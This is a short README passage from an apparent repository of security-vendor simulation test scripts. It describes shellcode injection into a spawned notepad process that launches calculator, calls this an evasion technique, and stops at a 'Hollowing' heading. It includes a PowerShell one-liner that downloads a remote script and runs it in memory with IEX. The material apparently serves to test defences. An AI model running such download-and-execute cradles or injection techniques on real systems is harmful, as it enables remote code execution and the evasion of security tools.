smgorelik/VendorSimTestScripts/README.md

 Injection of shellcode into the entry of a legitimate spawn process In this example we will inject shellcode into notepad that spawns calculator

+** Unfortunately MITRE doesn't have a technique mapping to shellcode injection, nevertheless its own of the popular evasion techniques **

 `PS> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/smgorelik/VendorSimTestScripts/main/Invoke-ShellcodeInjection1.ps1"); Invoke-Shellcode1;`

 ### 2. Hollowing